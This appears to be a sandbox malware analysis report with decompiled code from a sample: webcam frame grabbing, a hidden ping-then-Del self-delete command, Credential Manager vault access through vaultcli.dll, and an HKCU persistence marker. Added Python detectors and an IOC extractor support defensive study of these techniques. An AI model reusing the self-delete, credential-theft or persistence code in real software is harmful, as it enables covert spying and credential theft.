                                                                    				_t63 =  *_t115(0x2d245f0, 0, 1, 0x2d27400,  &_v20);
                                                                    				_t98 = _v20;
                                                                    				if(_t98 != 0) {
                                                                    					 *((intOrPtr*)( *_t98 + 0xc))(_t98, _v12, L"Source");    // slot 0xC: AddFilter(_v12, L"Source")
                                                                    					_t76 = _v20;
                                                                    					 *((intOrPtr*)( *_t76 + 0xc))(_t76, _v16, L"Grabber");   // slot 0xC: AddFilter(_v16, L"Grabber")
                                                                    					E02D11052( &_v144, 0, 0x48);                             // memset(&mt, 0, sizeof(AM_MEDIA_TYPE))
                                                                    					_t80 = _v24;
                                                                    					// Eight movsd copy 32 bytes into the zeroed struct: its two leading GUIDs (majortype,
                                                                    					// subtype). The "vids" string listed below is the ASCII form of MEDIATYPE_Video's first DWORD.
                                                                    					asm("movsd");
                                                                    					asm("movsd");
                                                                    					asm("movsd");
                                                                    					asm("movsd");
                                                                    					asm("movsd");
                                                                    					asm("movsd");
                                                                    					asm("movsd");
                                                                    					asm("movsd");
                                                                    					 *((intOrPtr*)( *_t80 + 0x10))(_t80,  &_v144);          // slot 0x10: SetMediaType(&mt)
                                                                    					_t63 = E02D22688();                                      // first pin for the Connect call below
                                                                    					_t118 = _t63;
                                                                    					if(_t118 != 0) {
                                                                    						_t63 = E02D226A4();                                  // second pin
                                                                    						_t89 = _t63;
                                                                    						if(_t89 != 0) {
                                                                    							_t103 = _v20;
                                                                    							_t63 =  *((intOrPtr*)( *_t103 + 0x2c))(_t103, _t118, _t89);   // slot 0x2C: Connect(out pin, in pin)
                                                                    							if(_t63 >= 0) {                                  // SUCCEEDED(hr)
                                                                    								_t82 = _v24;
                                                                    								 *((intOrPtr*)( *_t82 + 0x14))(_t82,  &_v216);   // slot 0x14: GetConnectedMediaType(&_v216)
                                                                    								_t105 = _v148;                                   // _v216.pbFormat
                                                                    								_t113 = _v148 + 0x30;                            // pbFormat + 0x30 = VIDEOINFOHEADER.bmiHeader
                                                                    								// Copies the 0x28-byte BITMAPINFOHEADER to the local at frame-0x44 (_v68); the
                                                                    								// decompiler renders the destination as _t121 + _v148 + 0x30 - _v148 - 0x74.
                                                                    								E02D1102C(_t121 + _v148 + 0x30 - _t105 - 0x74, _v148 + 0x30, 0x28);
                                                                    								E02D224EB( &_v216);                              // releases the media type (CoTaskMemFree per API list)
                                                                    								_t63 = E02D22B2A(_v28, _t113, _a4, _v64, _v68, _v58);   // continues with the negotiated format
                                                                    							}
                                                                    						}
                                                                    					}
                                                                    				}
                                                                    				goto L8;
                                                                    			}
                                                                    
                                                                    (instruction address column for the listing above, 0x02d22748 to 0x02d2290c, not reproduced here)

                                                                    APIs
                                                                    • CoInitialize.OLE32(00000000), ref: 02D2274C
                                                                    • CoCreateInstance.OLE32(02D245A0,00000000,00000001,02D27410,02D2227B), ref: 02D22779
                                                                    • CoUninitialize.OLE32 ref: 02D22902
                                                                      • Part of subcall function 02D22A6B: CoCreateInstance.OLE32(02D245E0,00000000,00000001,02D273F0,?,7426B690,00000000,00000000,?,?,02D227B0), ref: 02D22A99
                                                                    • CoCreateInstance.OLE32(02D245F0,00000000,00000001,02D27400,?), ref: 02D227CA
                                                                      • Part of subcall function 02D224EB: CoTaskMemFree.OLE32(?,?,00000000,02D22896), ref: 02D224F9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateInstance$FreeInitializeTaskUninitialize
                                                                    • String ID: Grabber$Source$vids
                                                                    • API String ID: 533512943-4200688928
                                                                    • Opcode ID: 76718ab0f42efa8d609ab3c40372d3f5520edf75e93f052e0c744eebd1ed0a03
                                                                    • Instruction ID: eb629e34342c58b951bd5ab31ce29d2e38f7a6ef95705f28a42ee0225918af47
                                                                    • Opcode Fuzzy Hash: 76718ab0f42efa8d609ab3c40372d3f5520edf75e93f052e0c744eebd1ed0a03
                                                                    • Instruction Fuzzy Hash: 87516E71A00219AFDB14DFA4C898EAEB7B9FF54309F048498F905AB350CB719D09CF60
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • _ValidateLocalCookies.LIBCMT ref: 00408B67
                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 00408B6F
                                                                    • _ValidateLocalCookies.LIBCMT ref: 00408BF8
                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00408C23
                                                                    • _ValidateLocalCookies.LIBCMT ref: 00408C78
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                    • String ID: csm$}@
                                                                    • API String ID: 1170836740-46996059
                                                                    • Opcode ID: 4cd76b12f01c8d82d8437f0c305f07ec6d8027105e77cf593ddfea1b485b80de
                                                                    • Instruction ID: 353043568e44341f1ffa93875867a5f43d3469eac26e56b1b565287b3a54fa84
                                                                    • Opcode Fuzzy Hash: 4cd76b12f01c8d82d8437f0c305f07ec6d8027105e77cf593ddfea1b485b80de
                                                                    • Instruction Fuzzy Hash: 1241E574A00208ABCF10DF69C984A9F7BB5EF44318F14816EF8546B3D2DB79A911CF99
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 80%
                                                                    			// Self-delete routine: removes a registry key, stops the worker thread, then starts a hidden
                                                                    			// cmd.exe that waits on a ping to an unroutable host and deletes the running executable
                                                                    			// once this process has exited and the file is no longer locked.
                                                                    			E02D12961() {
                                                                    				char _v8;
                                                                    				struct _PROCESS_INFORMATION _v24;
                                                                    				struct _STARTUPINFOA _v92;
                                                                    				char _v352;                 // own path, 0x104 (MAX_PATH) bytes
                                                                    				char _v816;                 // command buffer + 56: where the path lands
                                                                    				char _v817;                 // command buffer + 55: the opening quote
                                                                    				char _v872;                 // command buffer: 55-byte prefix, '"', path, '"', NUL
                                                                    				void* _t63;
                                                                    				void* _t70;
                                                                    				void* _t73;
                                                                    
                                                                    				_t63 = _t70;
                                                                    				_t73 = _t63;
                                                                    				E02D20F31(_t73 + 0x10);                        // subcall: RegDeleteKeyW(HKEY_CURRENT_USER, ...)
                                                                    				if( *((intOrPtr*)(_t73 + 0x68)) != 0) {
                                                                    					TerminateThread( *0x2e5cbec, 0);            // kill the worker thread kept in a global
                                                                    				}
                                                                    				if( *((intOrPtr*)(_t73 + 0x50)) != 0) {
                                                                    					E02D2106C(_t73 + 4,  *((intOrPtr*)(_t73 + 8)), _t73 + 0x14, 0x20006, 0);   // 0x20006 == KEY_WRITE
                                                                    					E02D1362D( &_v8, _t73 + 0x54);
                                                                    					E02D20F4C(_t73 + 4,  &_v8);
                                                                    					E02D15EA5(_v8);
                                                                    					E02D20FAE(_t73 + 4);
                                                                    				}
                                                                    				E02D11052( &_v92, 0, 0x44);                    // memset-like: zero the 0x44-byte STARTUPINFOA
                                                                    				asm("stosd");                                   // four stosd: zero the 16-byte PROCESS_INFORMATION
                                                                    				asm("stosd");
                                                                    				asm("stosd");
                                                                    				asm("stosd");
                                                                    				GetModuleFileNameA(0,  &_v352, 0x104);
                                                                    				// The prefix is exactly 0x37 = 55 characters; E02D1102C copies n bytes, E02D11133 returns the path length.
                                                                    				E02D1102C( &_v872, "cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q ", 0x37);
                                                                    				E02D1102C( &_v817, "\"", 1);
                                                                    				E02D1102C( &_v816,  &_v352, E02D11133( &_v352));
                                                                    				E02D1102C(E02D11133( &_v352) + 0x38 +  &_v872, "\"", 2);   // closing quote plus terminating NUL
                                                                    				CreateProcessA(0,  &_v872, 0, 0, 0, 0x8000000, 0, 0,  &_v92,  &_v24);   // 0x8000000 == CREATE_NO_WINDOW
                                                                    				CloseHandle(_v24.hThread);
                                                                    				CloseHandle(_v24.hProcess);
                                                                    				ExitProcess(0);                                 // exit before the ping delay expires so Del can remove the file
                                                                    			}

                                                                    APIs
                                                                      • Part of subcall function 02D20F31: RegDeleteKeyW.ADVAPI32(80000001,?), ref: 02D20F38
                                                                    • TerminateThread.KERNEL32(00000000,?,?), ref: 02D21740
                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?), ref: 02D217AD
                                                                    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 02D21837
                                                                    • CloseHandle.KERNEL32(?), ref: 02D21846
                                                                    • CloseHandle.KERNEL32(?), ref: 02D2184B
                                                                    • ExitProcess.KERNEL32 ref: 02D2184E
                                                                    Strings
                                                                    • cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q , xrefs: 02D217BB
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseHandleProcess$CreateDeleteExitFileModuleNameTerminateThread
                                                                    • String ID: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q
                                                                    • API String ID: 3630425516-84290196
                                                                    • Opcode ID: a17272a6ea81dbbe299e57eafe1dc731728a11c976fa3a8a1f4234ce8d2ca323
                                                                    • Instruction ID: 899bbea896035bd0687cd8f5ef1c83dbb02fc95dab64f2b4ba349db67703f7be
                                                                    • Opcode Fuzzy Hash: a17272a6ea81dbbe299e57eafe1dc731728a11c976fa3a8a1f4234ce8d2ca323
                                                                    • Instruction Fuzzy Hash: 343141B1D00628FBDB11EAE0DD85EDEB77EEF54305F104465B605A2640D774EE58CEA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

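The routine above builds a `cmd.exe /C ping ... & Del /f /q "<path>"` command line so that the file is deleted only after the process that is locked on it has exited. The following is an added detection example, not code from the report or from the sample: it inspects process-creation events for that ping-then-Del pattern and checks whether the file being deleted is the parent process's own image, which separates a self-delete from an installer cleaning up a temporary file. The events are constructed Sysmon-style records with placeholder paths, not data from this analysis, and the regex captures host, count and wait instead of the literal `1.2.3.4 -n 2 -w 1000`, which is this example's generalisation of what the report shows.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional

# Command line assembled by E02D12961 (55-character prefix, then the quoted path):
#   cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q "<own path>"
# Host, count and wait are captured instead of hard-coded so that the obvious
# variants (another dead host, a longer wait) are caught as well. That widening
# is an assumption of this example; the report only shows the literal above.
PING_DELETE_RE = re.compile(
    r"cmd(?:\.exe)?\s+/c\s+"
    r"ping\s+(?P<host>\S+)\s+-n\s+(?P<count>\d+)\s+-w\s+(?P<wait>\d+)\s*>\s*nul"
    r"\s*&\s*del\s+(?P<flags>(?:/[a-z]\s+)*)"
    r'"?(?P<target>[^"]+?)"?\s*$',
    re.IGNORECASE,
)


@dataclass
class SelfDeleteHit:
    target: str           # file the Del command removes
    delay_ms: int         # ping timeout budget (count * wait) before the delete runs
    deletes_parent: bool  # True when the target is the parent process's own image


def normalise_path(path: str) -> str:
    """Case-insensitive comparison of Windows paths, ignoring quotes and slash style."""
    return path.strip().strip('"').replace("/", "\\").lower()


def detect_ping_delete(event: dict) -> Optional[SelfDeleteHit]:
    """Inspect one process-creation event (Image, CommandLine, ParentImage)."""
    m = PING_DELETE_RE.search(event.get("CommandLine", ""))
    if m is None:
        return None
    target = m.group("target").strip()
    delay_ms = int(m.group("count")) * int(m.group("wait"))
    parent = event.get("ParentImage", "")
    return SelfDeleteHit(
        target=target,
        delay_ms=delay_ms,
        deletes_parent=normalise_path(target) == normalise_path(parent),
    )


def scan(events: Iterable[dict]) -> List[SelfDeleteHit]:
    """Return a hit for every event whose command line carries the ping-then-Del pattern."""
    return [hit for hit in (detect_ping_delete(e) for e in events) if hit is not None]


# Constructed Sysmon-style process-creation events (not taken from the report);
# the file paths are placeholders.
SAMPLE_EVENTS = [
    {   # the sample's own self-delete, launched from the executable being deleted
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r'cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q "C:\Users\user\Desktop\sample.exe"',
        "ParentImage": r"C:\Users\user\Desktop\sample.exe",
    },
    {   # benign connectivity check: no Del, so no hit
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": "cmd.exe /C ping 8.8.8.8 -n 4",
        "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    },
    {   # same delay trick but deleting another file: a hit, but not a self-delete
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r'cmd.exe /C ping 127.0.0.1 -n 3 -w 500 > Nul & Del /f /q "C:\Temp\stage1.tmp"',
        "ParentImage": r"C:\Temp\installer.exe",
    },
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit)
```

The parent-image comparison is the part worth keeping in a production rule: the ping-and-Del idiom is also used by legitimate updaters, but a cmd.exe whose parent is the very file it is about to delete is almost always a dropper or stager removing itself.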
                                                                    C-Code - Quality: 94%
                                                                    			// Loads vaultcli.dll and resolves the Credential Manager (Vault) API by name through E02D20969,
                                                                    			// a home-grown export walker (it compares names with lstrcmpA instead of calling GetProcAddress).
                                                                    			// Returns 1 only when every checked export was found; the function pointers are kept in the object.
                                                                    			E02D1B559(void* __ecx) {
                                                                    				struct HINSTANCE__* _t17;
                                                                    				intOrPtr _t21;
                                                                    				intOrPtr _t24;
                                                                    				void* _t27;
                                                                    				char* _t43;
                                                                    				void* _t45;
                                                                    				void* _t46;
                                                                    
                                                                    				_t27 = __ecx;
                                                                    				_t45 = __ecx;                                   // this: object that receives the resolved pointers
                                                                    				_t17 = LoadLibraryA("vaultcli.dll");
                                                                    				 *(_t45 + 0xc0) = _t17;                         // this+0xc0: vaultcli.dll module handle
                                                                    				_t46 = _t17;
                                                                    				if(_t17 == 0) {
                                                                    					L7:
                                                                    					__eflags = 0;
                                                                    					return 0;
                                                                    				} else {
                                                                    					_push(_t27);
                                                                    					 *((intOrPtr*)(_t45 + 0x8c)) = E02D20969(_t17, "VaultOpenVault", _t46);
                                                                    					 *((intOrPtr*)(_t45 + 0x90)) = E02D20969( *(_t45 + 0xc0), "VaultCloseVault", _t46);
                                                                    					_t21 = E02D20969( *(_t45 + 0xc0), "VaultEnumerateItems", _t46);
                                                                    					_t43 = "VaultGetItem";
                                                                    					 *((intOrPtr*)(_t45 + 0x94)) = _t21;
                                                                    					// VaultGetItem is resolved twice, into this+0x98 and this+0x9c
                                                                    					 *((intOrPtr*)(_t45 + 0x98)) = E02D20969( *(_t45 + 0xc0), "VaultGetItem", _t46);
                                                                    					 *((intOrPtr*)(_t45 + 0x9c)) = E02D20969( *(_t45 + 0xc0), _t43, _t46);
                                                                    					_t24 = E02D20969( *(_t45 + 0xc0), "VaultFree", _t46);
                                                                    					 *((intOrPtr*)(_t45 + 0xa0)) = _t24;
                                                                    					// Only the first VaultGetItem copy (this+0x98) is validated; this+0x9c is never checked.
                                                                    					if( *((intOrPtr*)(_t45 + 0x8c)) == 0 ||  *((intOrPtr*)(_t45 + 0x94)) == 0 ||  *((intOrPtr*)(_t45 + 0x90)) == 0 ||  *((intOrPtr*)(_t45 + 0x98)) == 0 || _t24 == 0) {
                                                                    						goto L7;
                                                                    					} else {
                                                                    						return 1;
                                                                    					}
                                                                    				}
                                                                    			}

                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(vaultcli.dll,00000000,02D1B229), ref: 02D1B561
                                                                      • Part of subcall function 02D20969: lstrcmpA.KERNEL32(?,02D21BD0,?,open,02D21BD0), ref: 02D209A2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: LibraryLoadlstrcmp
                                                                    • String ID: VaultCloseVault$VaultEnumerateItems$VaultFree$VaultGetItem$VaultOpenVault$vaultcli.dll
                                                                    • API String ID: 2493137890-3967309459
                                                                    • Opcode ID: 75603769e0e4975594e5ee26527bbca7da63d32ca8ae270e509e090c18290131
                                                                    • Instruction ID: 3e5e76d177bb83e0629ef2c18c50cef50bd422877c240f3c3ec5f996562eaf56
                                                                    • Opcode Fuzzy Hash: 75603769e0e4975594e5ee26527bbca7da63d32ca8ae270e509e090c18290131
                                                                    • Instruction Fuzzy Hash: 0311E934A01711CFE7289B71B444BA7B6E6EBB4219F54492FC49B97740DB70AC05CF10
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			// Persistence marker: stores the executable's own path (the global buffer at 0x2e5cbf0, filled by
                                                                    			// GetModuleFileNameW in E02D21A3C) as the REG_SZ value Install under HKCU\SOFTWARE\_rptls.
                                                                    			E02D219C9(void* __ecx) {
                                                                    				void* _v8;
                                                                    				int _v12;
                                                                    				short* _t16;
                                                                    
                                                                    				_t16 = L"SOFTWARE\\_rptls";
                                                                    				// 0x80000001 == HKEY_CURRENT_USER, 0xf003f == KEY_ALL_ACCESS; the key is created if it does not exist yet
                                                                    				if(RegOpenKeyExW(0x80000001, _t16, 0, 0xf003f,  &_v8) != 0) {
                                                                    					RegCreateKeyExW(0x80000001, _t16, 0, 0, 0, 0xf003f, 0,  &_v8,  &_v12);
                                                                    				}
                                                                    				// dwType 1 == REG_SZ. cbData is lstrlenW(path) << 2, four bytes per character, which is twice the
                                                                    				// UTF-16 size of the string, so the bytes following the terminator in the buffer are stored as well.
                                                                    				RegSetValueExW(_v8, L"Install", 0, 1, 0x2e5cbf0, lstrlenW(0x2e5cbf0) << 2);
                                                                    				return RegCloseKey(_v8);
                                                                    			}

                                                                    APIs
                                                                    • RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\_rptls,00000000,000F003F,?,00000208,02E5CBF0,?,?,?,?,02D21A78), ref: 02D219E9
                                                                    • RegCreateKeyExW.ADVAPI32(80000001,SOFTWARE\_rptls,00000000,00000000,00000000,000F003F,00000000,?,?,?,?,?,?,02D21A78), ref: 02D21A06
                                                                    • lstrlenW.KERNEL32(02E5CBF0,?,?,?,?,02D21A78,?,?,?,?,02D157B9,?,00000000,00000000), ref: 02D21A12
                                                                    • RegSetValueExW.ADVAPI32(?,Install,00000000,00000001,02E5CBF0,00000000,?,?,?,?,02D21A78,?,?,?,?,02D157B9), ref: 02D21A28
                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,02D21A78,?,?,?,?,02D157B9,?,00000000,00000000), ref: 02D21A31
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseCreateOpenValuelstrlen
                                                                    • String ID: Install$SOFTWARE\_rptls
                                                                    • API String ID: 2036214137-3226779556
                                                                    • Opcode ID: 3dfa5586978db0a744b2306e5b751557dadc9a0ba22c423f4f4def7426b48b64
                                                                    • Instruction ID: 471d39798f9980dd561fe08f45449bd9ba3a7b9999e292e3c040fce1ba27cb07
                                                                    • Opcode Fuzzy Hash: 3dfa5586978db0a744b2306e5b751557dadc9a0ba22c423f4f4def7426b48b64
                                                                    • Instruction Fuzzy Hash: C5F0AF72940028BFE7305692ED4DEEB7F7CEF96755B110069FD05E2201C6605E58C6B0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

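The two listings above, the vaultcli.dll resolver E02D1B559 and the HKCU\SOFTWARE\_rptls writer E02D219C9, expose their host indicators through the "APIs" entries of this report (the `• Name.MODULE(args), ref: ADDR` lines, with "Part of subcall function" entries indented beneath their caller). The following is an added example, not part of the report or of Joe Sandbox's tooling: it parses entries in that format into structured calls and derives indicators from them, resolving the predefined hive constant in registry calls, pairing each RegSetValueExW with the key opened just before it, listing loaded libraries and flagging a TokenIntegrityLevel query. The sample input is a handful of API lines copied from this report's listings; the association of a RegSetValueExW whose handle is shown as `?` with the most recently opened key is a heuristic of this example, not something the report states.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# One "APIs" entry of a Joe Sandbox function listing, for example
#   • RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\_rptls,...), ref: 02D219E9
#   • Part of subcall function 02D20969: lstrcmpA.KERNEL32(...), ref: 02D209A2
#   • ExitProcess.KERNEL32 ref: 02D2184E            (no argument list at all)
API_LINE_RE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Predefined registry handles and value types (Windows SDK constants).
HIVES = {0x80000000: "HKCR", 0x80000001: "HKCU", 0x80000002: "HKLM", 0x80000003: "HKU"}
REG_TYPES = {1: "REG_SZ", 2: "REG_EXPAND_SZ", 3: "REG_BINARY", 4: "REG_DWORD", 7: "REG_MULTI_SZ"}


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: str
    subcall_of: Optional[str] = None   # address of the callee when the entry is a subcall line


def parse_api_lines(text: str) -> List[ApiCall]:
    """Turn the text of an 'APIs' list into ApiCall records; headings and stray lines are skipped."""
    calls: List[ApiCall] = []
    for line in text.splitlines():
        m = API_LINE_RE.match(line)
        if m is None:
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append(ApiCall(m.group("api"), m.group("mod"), args, m.group("ref").upper(), m.group("sub")))
    return calls


def _hex(arg: str) -> Optional[int]:
    """Decode a zero-padded hex argument; '?' (unknown) and annotated values like
    '00000014(TokenIntegrityLevel)' are handled by taking the part before '('."""
    try:
        return int(arg.split("(")[0], 16)
    except ValueError:
        return None


@dataclass
class Iocs:
    registry_keys: List[str] = field(default_factory=list)
    registry_values: List[Tuple[Optional[str], str, str]] = field(default_factory=list)  # (key, name, type)
    loaded_dlls: List[str] = field(default_factory=list)
    queries_integrity_level: bool = False


def extract_iocs(calls: List[ApiCall]) -> Iocs:
    iocs = Iocs()
    last_key: Optional[str] = None   # heuristic: a RegSetValueEx with a '?' handle targets the key opened/created just before it
    for c in calls:
        if c.api in ("RegOpenKeyExA", "RegOpenKeyExW", "RegCreateKeyExA", "RegCreateKeyExW") and len(c.args) >= 2:
            hive = HIVES.get(_hex(c.args[0]), c.args[0])
            last_key = f"{hive}\\{c.args[1]}"
            if last_key not in iocs.registry_keys:
                iocs.registry_keys.append(last_key)
        elif c.api in ("RegSetValueExA", "RegSetValueExW") and len(c.args) >= 4:
            rtype = REG_TYPES.get(_hex(c.args[3]), c.args[3])
            iocs.registry_values.append((last_key, c.args[1], rtype))
        elif c.api in ("LoadLibraryA", "LoadLibraryW", "LoadLibraryExA", "LoadLibraryExW") and c.args:
            iocs.loaded_dlls.append(c.args[0].lower())
        elif c.api == "GetTokenInformation" and any("TokenIntegrityLevel" in a for a in c.args):
            iocs.queries_integrity_level = True
    return iocs


# API lines copied from this report's function listings (headings included to show they are skipped).
SAMPLE_API_LINES = r"""
APIs
• LoadLibraryA.KERNEL32(vaultcli.dll,00000000,02D1B229), ref: 02D1B561
  • Part of subcall function 02D20969: lstrcmpA.KERNEL32(?,02D21BD0,?,open,02D21BD0), ref: 02D209A2
• RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\_rptls,00000000,000F003F,?,00000208,02E5CBF0,?,?,?,?,02D21A78), ref: 02D219E9
• RegCreateKeyExW.ADVAPI32(80000001,SOFTWARE\_rptls,00000000,00000000,00000000,000F003F,00000000,?,?,?,?,?,?,02D21A78), ref: 02D21A06
• lstrlenW.KERNEL32(02E5CBF0,?,?,?,?,02D21A78,?,?,?,?,02D157B9,?,00000000,00000000), ref: 02D21A12
• RegSetValueExW.ADVAPI32(?,Install,00000000,00000001,02E5CBF0,00000000,?,?,?,?,02D21A78,?,?,?,?,02D157B9), ref: 02D21A28
• RegCloseKey.ADVAPI32(?,?,?,?,?,02D21A78,?,?,?,?,02D157B9,?,00000000,00000000), ref: 02D21A31
• GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,?,02D235AB,?), ref: 02D1FC33
• ExitProcess.KERNEL32 ref: 02D2184E
Strings
"""

if __name__ == "__main__":
    print(extract_iocs(parse_api_lines(SAMPLE_API_LINES)))
```

The output for the sample lines is a single key, `HKCU\SOFTWARE\_rptls`, one value, `Install` of type `REG_SZ`, the library `vaultcli.dll`, and the integrity-level flag set; those are the pieces an analyst would carry into a registry or image-load hunt.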
                                                                    C-Code - Quality: 88%
                                                                    			// Install entry point: records the executable's own path and, when the caller is neither an
                                                                    			// administrator nor at the integrity level E02D1FBFC tests for, writes the HKCU marker and hands
                                                                    			// the embedded resource "WM_DSP" to E02D21936.
                                                                    			E02D21A3C(void* __ebx, void* __ecx, void* __eflags) {
                                                                    				long _t2;
                                                                    				void* _t8;
                                                                    				void* _t10;
                                                                    				struct HINSTANCE__* _t13;
                                                                    				void* _t15;
                                                                    				struct HRSRC__* _t18;
                                                                    
                                                                    				_t15 = __ecx;
                                                                    				E02D11052(0x2e5cbf0, 0, 0x208);                // zero the global path buffer
                                                                    				GetModuleFileNameW(0, 0x2e5cbf0, 0x208);
                                                                    				// __imp__#680 is shell32 ordinal 680, IsUserAnAdmin (see the API list). The raw decompiler output kept
                                                                    				// _t2 from GetModuleFileNameW, but the test that follows is on the value returned by this call.
                                                                    				_t2 = IsUserAnAdmin();
                                                                    				if(_t2 == 0 && E02D1FBFC() != 1) {             // E02D1FBFC: GetTokenInformation(TokenIntegrityLevel) check
                                                                    					E02D219C9(_t15);                           // HKCU\SOFTWARE\_rptls\Install = own path
                                                                    					_t13 = E02D21CA2(_t15);
                                                                    					_t18 = FindResourceW(_t13, 0x66, L"WM_DSP");   // resource name 102 (MAKEINTRESOURCE(0x66)), type "WM_DSP"
                                                                    					_t8 = LoadResource(_t13, _t18);
                                                                    					SizeofResource(_t13, _t18);
                                                                    					_t10 = LockResource(_t8);
                                                                    					if(_t10 != 0) {
